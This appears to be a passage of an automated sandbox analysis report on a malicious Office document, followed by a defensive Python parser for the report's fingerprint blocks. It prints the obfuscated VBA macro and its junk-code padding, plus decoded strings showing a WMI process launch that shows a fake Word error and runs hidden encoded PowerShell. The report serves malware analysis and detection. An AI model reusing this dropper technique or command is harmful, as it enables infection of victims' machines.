)(ApAqq)(s2)(CkAqq)(s2)(OwAqq)(s2)(gACqq)(s2)(QAWqq)(s2)(ABkqq)(s2)(AHoqq)(s2)(AXwqq)(s2)(B0Aqq)(s2)(F8Aqq)(s2)(aQAqq)(s2)(9ACqq)(s2)(gAJqq)(s2)(wBBqq)(s2)(AHUqq)(s2)(AJwqq)(s2)(ArAqq)(s2)(CgAqq)(s2)(JwBqq)(s2)(6ADqq)(s2)(AAeqq)(s2)(gAnqq)(s2)(ACsqq)(s2)(AJwqq)(s2)(BxAqq)(s2)(HgAqq)(s2)(JwAqq)(s2)(pACqq)(s2)(kAOqq)(s2)(wAkqq)(s2)(AFAqq)(s2)(AaQqq)(s2)(BpAqq)(s2)(DgAqq)(s2)(bwBqq)(s2)(lAGqq)(s2)(4APqq)(s2)(QAkqq)(s2)(AEIqq)(s2)(AMAqq)(s2)(B4Aqq)(s2)(GsAqq)(s2)(MAAqq)(s2)(0AHqq)(s2)(IAIqq)(s2)(AArqq)(s2)(ACAqq)(s2)(AWwqq)(s2)(BjAqq)(s2)(GgAqq)(s2)(YQBqq)(s2)(yAFqq)(s2)(0AKqq)(s2)(AA2qq)(s2)(ADQqq)(s2)(AKQqq)(s2)(AgAqq)(s2)(CsAqq)(s2)(IAAqq)(s2)(kAFqq)(s2)(YAYqq)(s2)(QBsqq)(s2)(ADYqq)(s2)(AcQqq)(s2)(BhAqq)(s2)(HgAqq)(s2)(OwAqq)(s2)(kAEqq)(s2)(wAcqq)(s2)(gBfqq)(s2)(AGwqq)(s2)(AcQqq)(s2)(BuAqq)(s2)(HcAqq)(s2)(PQAqq)(s2)(oACqq)(s2)(gAJqq)(s2)(wBQqq)(s2)(AGsqq)(s) -> 29620

                                                                                                                        executed
                                                                                                                        288

                                                                                                                        Goto NmHsEFc

                                                                                                                        289

                                                                                                                        Dim zZMYCtCAX as String

                                                                                                                        290

                                                                                                                        Dim sutvLcBD as String

                                                                                                                        291

                                                                                                                        Open "DGVxCZh.RlEFPCEb.wIwVQJJBo" For Binary As 135

                                                                                                                        Open

                                                                                                                        294

                                                                                                                        Put # 135, , zZMYCtCAX

                                                                                                                        295

                                                                                                                        Close # 135

                                                                                                                        295

                                                                                                                        NmHsEFc:

                                                                                                                        297

                                                                                                                        Goto FQNmffWt

                                                                                                                        298

                                                                                                                        Dim VlqRGAP as String

                                                                                                                        299

                                                                                                                        Dim eQxzwIAB as String

                                                                                                                        300

                                                                                                                        Open "XBCgYJ.OzLWBT.wAQnUP" For Binary As 192

                                                                                                                        Open

                                                                                                                        303

                                                                                                                        Put # 192, , VlqRGAP

                                                                                                                        304

                                                                                                                        Close # 192

                                                                                                                        304

                                                                                                                        FQNmffWt:

                                                                                                                        306

                                                                                                                        Goto bsoyVGCFI

                                                                                                                        307

                                                                                                                        Dim yghyBIF as String

                                                                                                                        308

                                                                                                                        Dim JGRXFCs as String

                                                                                                                        309

                                                                                                                        Open "glqhDDI.CLTNCt.xZeqp" For Binary As 224

                                                                                                                        Open

                                                                                                                        312

                                                                                                                        Put # 224, , yghyBIF

                                                                                                                        313

                                                                                                                        Close # 224

                                                                                                                        313

                                                                                                                        bsoyVGCFI:

                                                                                                                        315

                                                                                                                        Goto DBkFIE

                                                                                                                        316

                                                                                                                        Dim zAnUQGvFH as String

                                                                                                                        317

                                                                                                                        Dim SfMUAAHuE as String

                                                                                                                        318

                                                                                                                        Open "pDOcllCuD.lEzLut.kKCfGuBND" For Binary As 120

                                                                                                                        Open

                                                                                                                        321

                                                                                                                        Put # 120, , zAnUQGvFH

                                                                                                                        322

                                                                                                                        Close # 120

                                                                                                                        322

                                                                                                                        DBkFIE:

                                                                                                                        324

                                                                                                                        Goto MBalHjB

                                                                                                                        325

                                                                                                                        Dim JQIjO as String

                                                                                                                        326

                                                                                                                        Dim rtldCJ as String

                                                                                                                        327

                                                                                                                        Open "ZVPyGDo.KHVpyJEJI.kpQfJeY" For Binary As 72

                                                                                                                        Open

                                                                                                                        330

                                                                                                                        Put # 72, , JQIjO

                                                                                                                        331

                                                                                                                        Close # 72

                                                                                                                        331

                                                                                                                        MBalHjB:

                                                                                                                        333

                                                                                                                        Goto mMdMmt

                                                                                                                        334

                                                                                                                        Dim jCSEHHF as String

                                                                                                                        335

                                                                                                                        Dim GLLJhAEHI as String

                                                                                                                        336

                                                                                                                        Open "zDQxMR.iplzr.wAjoodIF" For Binary As 121

                                                                                                                        Open

                                                                                                                        339

                                                                                                                        Put # 121, , jCSEHHF

                                                                                                                        340

                                                                                                                        Close # 121

                                                                                                                        340

                                                                                                                        mMdMmt:

                                                                                                                        342

                                                                                                                        Jb9o1wbsdr9.Create Y94cd7j9wr9jms(Bzj0r4l7ded), Jib98w2i8chhr, N4enanrrzm_ja

                                                                                                                        SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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,,) -> 0

                                                                                                                        Jib98w2i8chhr

                                                                                                                        N4enanrrzm_ja

                                                                                                                        executed
                                                                                                                        343

                                                                                                                        Goto GrdEGI

                                                                                                                        344

                                                                                                                        Dim OEleEeCT as String

                                                                                                                        345

                                                                                                                        Dim ZTXrGl as String

                                                                                                                        346

                                                                                                                        Open "QrkQH.tOWCIP.GrDHUJ" For Binary As 191

                                                                                                                        Open

                                                                                                                        349

                                                                                                                        Put # 191, , OEleEeCT

                                                                                                                        350

                                                                                                                        Close # 191

                                                                                                                        350

                                                                                                                        GrdEGI:

                                                                                                                        352

                                                                                                                        Goto tzmsZ

                                                                                                                        353

                                                                                                                        Dim UWnPEFF as String

                                                                                                                        354

                                                                                                                        Dim uRYMAlGHA as String

                                                                                                                        355

                                                                                                                        Open "LQAVC.FldzmI.oCeVXZC" For Binary As 181

                                                                                                                        Open

                                                                                                                        358

                                                                                                                        Put # 181, , UWnPEFF

                                                                                                                        359

                                                                                                                        Close # 181

                                                                                                                        359

                                                                                                                        tzmsZ:

                                                                                                                        361

                                                                                                                        Goto NQfbJHA

                                                                                                                        362

                                                                                                                        Dim pXLSUvXGL as String

                                                                                                                        363

                                                                                                                        Dim yXjmE as String

                                                                                                                        364

                                                                                                                        Open "xbtmGo.qIuZXGHJ.RZptvtQEG" For Binary As 127

                                                                                                                        Open

                                                                                                                        367

                                                                                                                        Put # 127, , pXLSUvXGL

                                                                                                                        368

                                                                                                                        Close # 127

                                                                                                                        368

                                                                                                                        NQfbJHA:

                                                                                                                        370

                                                                                                                        Goto ZXOpRLQFH

                                                                                                                        371

                                                                                                                        Dim HmbOBrAAC as String

                                                                                                                        372

                                                                                                                        Dim ZSAiDINAr as String

                                                                                                                        373

                                                                                                                        Open "cRxbPCb.XykXFJGA.LtZggMsGa" For Binary As 103

                                                                                                                        Open

                                                                                                                        376

                                                                                                                        Put # 103, , HmbOBrAAC

                                                                                                                        377

                                                                                                                        Close # 103

                                                                                                                        377

                                                                                                                        ZXOpRLQFH:

                                                                                                                        379

                                                                                                                        Goto mfYda

                                                                                                                        380

                                                                                                                        Dim iqyjE as String

                                                                                                                        381

                                                                                                                        Dim omutJ as String

                                                                                                                        382

                                                                                                                        Open "HoPXpGBA.IwHCJMDRA.CmlzH" For Binary As 82

                                                                                                                        Open

                                                                                                                        385

                                                                                                                        Put # 82, , iqyjE

                                                                                                                        386

                                                                                                                        Close # 82

                                                                                                                        386

                                                                                                                        mfYda:

                                                                                                                        388

                                                                                                                        Goto LZRViG

                                                                                                                        389

                                                                                                                        Dim CIXpj as String

                                                                                                                        390

                                                                                                                        Dim uweUHDE as String

                                                                                                                        391

                                                                                                                        Open "OECHJGADF.eWIOVB.CjlHH" For Binary As 170

                                                                                                                        Open

                                                                                                                        394

                                                                                                                        Put # 170, , CIXpj

                                                                                                                        395

                                                                                                                        Close # 170

                                                                                                                        395

                                                                                                                        LZRViG:

                                                                                                                        397

End Function

APIs    Meta Information
Open
Open
Open
Open
Open
Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Replace
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Owy08cjm2ufmu
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open
Open
Open
Open
Open
Open
Open

Strings    Decrypted Strings
"VqHUG.ZFPuZgUK.BaCFC"
"NhKoBJB.bXBco.DTUxEg"
"tMHiBAq.JuMHZKNBq.cgyJFF"
"NuPRDAFC.UhBsmID.EkqPGFJEG"
"qqPeDr.wSQVWc.pJeJCC"
"FgtNVBC.LAhZJM.HJpZQ"
"ufMYp.QtEuJ.OwOyxH"
"HDCkBsF.dMGCBEF.ufLRD"
"nOQNGhA.FYVFJ.bklIA"
"KmgdV.ZGtAJHtj.ONGSH"
"MmewC.AVQUDGmHG.vtFSCPB"
"xRrfF.YqkEzRF.kLUPqyCFD"
Line    Instruction    Meta Information
398    Function Y94cd7j9wr9jms(Sdit1klsk_3t9o5mv)
399    On Error Resume Next    executed
400    Goto pbMAHF
401    Dim ZPidFrt as String
402    Dim rOzmqEAQ as String
403    Open "VqHUG.ZFPuZgUK.BaCFC" For Binary As 107    Open
406    Put # 107, , ZPidFrt
407    Close # 107
407    pbMAHF:
409    Goto HZVSIIU
410    Dim diQYvIIAB as String
411    Dim fRocABAt as String
412    Open "NhKoBJB.bXBco.DTUxEg" For Binary As 221    Open
415    Put # 221, , diQYvIIAB
416    Close # 221
416    HZVSIIU:
418    Goto IOzIsOFA
419    Dim iMqHCHFJ as String
420    Dim mKReIEI as String
421    Open "tMHiBAq.JuMHZKNBq.cgyJFF" For Binary As 166    Open
424    Put # 166, , iMqHCHFJ
425    Close # 166
425    IOzIsOFA:
427    Ilf72gd2e5isgp_i = (Sdit1klsk_3t9o5mv)
428    Goto khzFG
429    Dim fVpImB as String
430    Dim CjlbH as String
431    Open "NuPRDAFC.UhBsmID.EkqPGFJEG" For Binary As 180    Open
434    Put # 180, , fVpImB
435    Close # 180
435    khzFG:
437    Goto KMpoSNLJ
438    Dim LxvXa as String
439    Dim ZMCcDFc as String
440    Open "qqPeDr.wSQVWc.pJeJCC" For Binary As 198    Open
443    Put # 198, , LxvXa
444    Close # 198
444    KMpoSNLJ:
446    Goto kwwmA
447    Dim qgkvFbl as String
448    Dim JjteHBBVA as String
449    Open "FgtNVBC.LAhZJM.HJpZQ" For Binary As 126    Open
452    Put # 126, , qgkvFbl
453    Close # 126
453    kwwmA:
455    J6sy08nwwbjsyvunu = Mrfzpndjp3s0k(Ilf72gd2e5isgp_i)
456    Goto yKflP
457    Dim TbyMA as String
458    Dim uuXLMGBEg as String
459    Open "ufMYp.QtEuJ.OwOyxH" For Binary As 132    Open
462    Put # 132, , TbyMA
463    Close # 132
463    yKflP:
465    Goto UcOAeq
466    Dim jzcemJ as String
467    Dim bTmHFI as String
468    Open "HDCkBsF.dMGCBEF.ufLRD" For Binary As 157    Open
471    Put # 157, , jzcemJ
472    Close # 157
472    UcOAeq:
474    Goto kydQU
475    Dim MQmKFAAtE as String
476    Dim ZldpVI as String
477    Open "nOQNGhA.FYVFJ.bklIA" For Binary As 150    Open
480    Put # 150, , MQmKFAAtE
481    Close # 150
481    kydQU:
483    Y94cd7j9wr9jms = J6sy08nwwbjsyvunu
484    Goto URTAHB
485    Dim oqOQrACK as String
486    Dim fZLyN as String
487    Open "KmgdV.ZGtAJHtj.ONGSH" For Binary As 237    Open
490    Put # 237, , oqOQrACK
491    Close # 237
491    URTAHB:
493    Goto aopzzCP
494    Dim RjcPJ as String
495    Dim RdYqcFDJ as String
496    Open "MmewC.AVQUDGmHG.vtFSCPB" For Binary As 136    Open
499    Put # 136, , RjcPJ
500    Close # 136
500    aopzzCP:
502    Goto eLkJvFE
503    Dim LwWkX as String
504    Dim WrCtJYU as String
505    Open "xRrfF.YqkEzRF.kLUPqyCFD" For Binary As 48    Open
508    Put # 48, , LwWkX
509    Close # 48
509    eLkJvFE:
511    End Function

APIs    Meta Information
Open
Open
Open
Replace

Replace("<obfuscated argument, opaque token run omitted>", "qq)(s2)(", ) -> winmgmtS:win32_process
Replace("<obfuscated argument, opaque token run omitted>", "qq)(s2)(", ) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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

                                                                                                                        Owy08cjm2ufmu

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

Strings

Decrypted Strings
"VVcDBJklB.wcffJ.HXsnGGAHN"
"emmJF.oEJjOD.giiLoEJv"
"aCKLVJaH.XtEZlTZ.CLelFNHGI"
"qq"")(s2)("
"FhCyJa.yKJBb.ijMMEFEqB"
"eLPyC.ZdqCDyGC.QcmSHJFJl"
"sVsyIHHN.BqamC.SasWG"
Line  Instruction                                                      Meta Information
2     Function Mrfzpndjp3s0k(Bnivj2ii9s31hmeej0)
3     Goto XwhzUcG                                                     executed
4     Dim pAYVi as String
5     Dim BtpGqEA as String
6     Open "VVcDBJklB.wcffJ.HXsnGGAHN" For Binary As 247               Open
9     Put # 247, , pAYVi
10    Close # 247
10    XwhzUcG:
12    Goto lyHkDXIOH
13    Dim flWCjiEl as String
14    Dim AoWWOyA as String
15    Open "emmJF.oEJjOD.giiLoEJv" For Binary As 168                   Open
18    Put # 168, , flWCjiEl
19    Close # 168
19    lyHkDXIOH:
21    Goto MPzbNgEEA
22    Dim cZYJwJI as String
23    Dim kWOHB as String
24    Open "aCKLVJaH.XtEZlTZ.CLelFNHGI" For Binary As 56               Open
27    Put # 56, , cZYJwJI
28    Close # 56
28    MPzbNgEEA:
30    Mrfzpndjp3s0k = VBA.Replace(Bnivj2ii9s31hmeej0, "qq" + ")(s2)(", Owy08cjm2ufmu)
                                                                       Replace("wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)(Sqq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)(qq)(s2)(pqq)(s2)(qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(","qq)(s2)(",) -> winmgmtS:win32_process
                                                                       Owy08cjm2ufmu
                                                                       executed
32    Goto WFNTzBZJ
33    Dim IbQUAAA as String
34    Dim iJBKl as String
35    Open "FhCyJa.yKJBb.ijMMEFEqB" For Binary As 152                  Open
38    Put # 152, , IbQUAAA
39    Close # 152
39    WFNTzBZJ:
41    Goto fYohsF
42    Dim wpmyAZDbH as String
43    Dim UWnwUuJ as String
44    Open "eLPyC.ZdqCDyGC.QcmSHJFJl" For Binary As 155                Open
47    Put # 155, , wpmyAZDbH
48    Close # 155
48    fYohsF:
50    Goto vaaYK
51    Dim sgQCI as String
52    Dim VqytEGCGP as String
53    Open "sVsyIHHN.BqamC.SasWG" For Binary As 143                    Open
56    Put # 143, , sgQCI
57    Close # 143
57    vaaYK:
59    End Function

Module: U2v6aydkxz3

Declaration
Line  Content
1     Attribute VB_Name = "U2v6aydkxz3"
2     Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Y6lmxng9ukvy69c

Declaration
Line  Content
1     Attribute VB_Name = "Y6lmxng9ukvy69c"
2     Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Z4lx7rwdfqe

Declaration
Line  Content
1     Attribute VB_Name = "Z4lx7rwdfqe"
2     Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False


                                                                                                                          Executed Functions

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a0f0c1cafc55af361770db8e4744d8c223fa27a6718a86f556aa346b6181c909
                                                                                                                          • Instruction ID: 366babc96afa4bcf97a5f9f08d51c6d390d01f1561bd707b71f93e94e1993d49
                                                                                                                          • Opcode Fuzzy Hash: a0f0c1cafc55af361770db8e4744d8c223fa27a6718a86f556aa346b6181c909
                                                                                                                          • Instruction Fuzzy Hash: B1F1C331E18A4D8FDB98DF5CC495AE9BBF1FF99310F15816AD40DD7296CA24E842CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38dd4ada337c48b4aacfb0390d923be99281511fa538704ef1d0ad30facddf96
                                                                                                                          • Instruction ID: e71f44506a73406da62dd67d158aa41670e50db4782f306a8c0114daa993f894
                                                                                                                          • Opcode Fuzzy Hash: 38dd4ada337c48b4aacfb0390d923be99281511fa538704ef1d0ad30facddf96
                                                                                                                          • Instruction Fuzzy Hash: 7DC12963E0DB924FE356A71C98A65F57FA0DF43275B0950BBD0CCC71A3E90468478B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 501b05c9c2c785a614872f2ef5ebe8dcdad127944a23f6883d842c24c5b9ea2b
• Instruction ID: 4acb919981ba63ed04937d34362a619da4f4ad0b5302cf4c7314d09948574a69
• Opcode Fuzzy Hash: 501b05c9c2c785a614872f2ef5ebe8dcdad127944a23f6883d842c24c5b9ea2b
• Instruction Fuzzy Hash: BAE1AF31E08A4D8FDB94DF5CC495AE9BBE1FF69310F1581AAD44DD7296CA24E842CBC0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c7ac84952db15420d34bf559f2e339f35d1422527625d34eb3085cfdaf1628c
• Instruction ID: 315b2a57c85ca628a5ad2a81f1b5e688469aee22aa7d4b33e16cd3e56c9429e6
• Opcode Fuzzy Hash: 3c7ac84952db15420d34bf559f2e339f35d1422527625d34eb3085cfdaf1628c
• Instruction Fuzzy Hash: 5751E23190CA894FD314DB18D855BE9BBE1FF86320F1586BBE44DC7292CE28A945CB81
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de61d375179813cbc080bfea8519b9c31be0b998014dc92b3e92d2ec9acd4513
• Instruction ID: c05b6e22221e2ddae4cfeb21fa23be18f5ffcd96294606d5e0d32bcbbc1d6d00
• Opcode Fuzzy Hash: de61d375179813cbc080bfea8519b9c31be0b998014dc92b3e92d2ec9acd4513
• Instruction Fuzzy Hash: A931F631B2CE494FDB58EB1CC485AB5B7E1FB9A325B10417DD48EC3296DA25F842CB81
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347945697.00007FFA16320000.00000040.00000001.sdmp, Offset: 00007FFA16320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16320000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 422363ed133977b6a186d331cd1343b902a0a1d5529f47cdc9df18d37a99f7f3
• Instruction ID: 139e65611d915c044b68944368a278bb81d447c91cf5d32cac290b5e7ad8bdfc
• Opcode Fuzzy Hash: 422363ed133977b6a186d331cd1343b902a0a1d5529f47cdc9df18d37a99f7f3
• Instruction Fuzzy Hash: 9231D232B0CE594FEAA5975C54516B9B3D2EF85721B5981BFCA1EC3282DD18EC104781
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347945697.00007FFA16320000.00000040.00000001.sdmp, Offset: 00007FFA16320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16320000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
• Instruction ID: 5cba2edc267eb637e6f5b450b65a98b49cb16ef87592f490d97a391c6338d4ac
• Opcode Fuzzy Hash: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
• Instruction Fuzzy Hash: 4A01F936F1DE1A4FFAE9931C15A51BC91D6DF85622B5D91BED91EC3386DC0CEC100681
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6be35493053188d9cbec5877f0ca99d054379078a65ebec433f9951a719ee1c
• Instruction ID: db9ff0528c9a54d13c194b1efe82364ed350c7e1f8ea560f6da5e144658656d1
• Opcode Fuzzy Hash: e6be35493053188d9cbec5877f0ca99d054379078a65ebec433f9951a719ee1c
• Instruction Fuzzy Hash: 6601447111CB088FD758EF0CE451AA6B7E0FB95364F10056DE58AC7651DA36E881CB46
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f91a65502a46064268203043a33f1b3f5e592802017d922371ade84f366d0670
• Instruction ID: 01954017f07c5578ba1ff2f565417e98a7a9a701e2a6d605c3de9ce85c642fb7
• Opcode Fuzzy Hash: f91a65502a46064268203043a33f1b3f5e592802017d922371ade84f366d0670
• Instruction Fuzzy Hash: 6DF0303276CA084FD75C9A0CF8439F573D1E78A225B40417EE4CEC2696E91AB8428685
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
• Instruction ID: b9f1ef7fa4f19f999cc62016c4554a4a4f596b29f24f00a2e1817c74c2956bf8
• Opcode Fuzzy Hash: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
• Instruction Fuzzy Hash: 89F0653276CA084FD75C9A0CF8429B5B3D5E78A325B40417EE4CFC2287E917F8468685
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
• Instruction ID: 585369e4197ee494f01e5596718ced3ac2fa7da140060cb3142b6c05eb302a57
• Opcode Fuzzy Hash: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
• Instruction Fuzzy Hash: 1BB12731E1CA5A4FD338DB58D4446F1B7D0EF46325B25D5BEC48EC7682DA29B842CB80
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eaa8aa6325ab8b811a9f0e166269e5174f6db56244e641a34f94acff7816210b
• Instruction ID: c171b1b0c67ececfc753e91819b8eea281c90ea47327517c040c2a7aaf2516fc
• Opcode Fuzzy Hash: eaa8aa6325ab8b811a9f0e166269e5174f6db56244e641a34f94acff7816210b
• Instruction Fuzzy Hash: 02610217E0DA615BE621776CFC965EABF90DF837717194073D1CCCA073DA08A88AC6A0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1ea7cfdd6900cad9087e0ef75b842fb684e228d0465cc03e54159b97d8386f46
• Instruction ID: c01e257156583ff25019b8d506062cf21231ee19f4d6fbfa3aca041a061d2f0c
• Opcode Fuzzy Hash: 1ea7cfdd6900cad9087e0ef75b842fb684e228d0465cc03e54159b97d8386f46
• Instruction Fuzzy Hash: 0C612417E096615FD621B76CFC955DABF90DF833717194073D5CCCA163DA08688AC6D0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc004e81c0bffcad840018f6869f0e5b57d262b24bfda5fa8295c915a8fa695e
• Instruction ID: fc43aa07a194b53a76ebd28524c7cfd3ee3d5c417fb012ee2373fd43e4b38f2e
• Opcode Fuzzy Hash: fc004e81c0bffcad840018f6869f0e5b57d262b24bfda5fa8295c915a8fa695e
• Instruction Fuzzy Hash: 23517B32E0CA194FE7289B68A4896F2B7D0EF47331B15917FC48EC7293D9287C458780
Uniqueness
Uniqueness Score: -1.00%
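The function-fingerprint blocks above are what an analyst usually has to work from when a Joe Sandbox report is exported as text: per function, the memory dump it was carved from, the IDA snapshot, the opcode/instruction IDs and fuzzy hashes, and whether the function executed. The following parser is an added example and is not Joe Sandbox code nor part of this report. It turns the blocks into records, groups them by memory region, and flags regions that are writable-and-executable and not backed by a PE image, which in a powershell.exe process is where JIT-compiled or injected code lives. The sample input is excerpted from this report (three records, one from the Non-executed Functions section). Two things are assumptions, not stated by the report: that the dotted fields of the .sdmp file name are pid, dump type, id, base address, protection and type, and that the protection field is the Windows constant (0x40 = PAGE_EXECUTE_READWRITE).

```python
"""Parse Joe Sandbox 'Memory Dump Source' function-fingerprint blocks.

Added example, not Joe Sandbox code. The .sdmp name layout and the meaning of
the protection field are assumptions (see comments); everything else is taken
from the report text itself.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Windows memory-protection constant; assumption: the 5th dotted field of the
# .sdmp name carries this value.
PAGE_EXECUTE_READWRITE = 0x40

# Constructed input: three records copied from the report above, with the
# report's bullet characters and leading whitespace as exported.
SAMPLE = """
      Memory Dump Source
      • Source File: 00000005.00000002.347945697.00007FFA16320000.00000040.00000001.sdmp, Offset: 00007FFA16320000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_5_2_7ffa16320000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
      • Instruction ID: 5cba2edc267eb637e6f5b450b65a98b49cb16ef87592f490d97a391c6338d4ac
      • Opcode Fuzzy Hash: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
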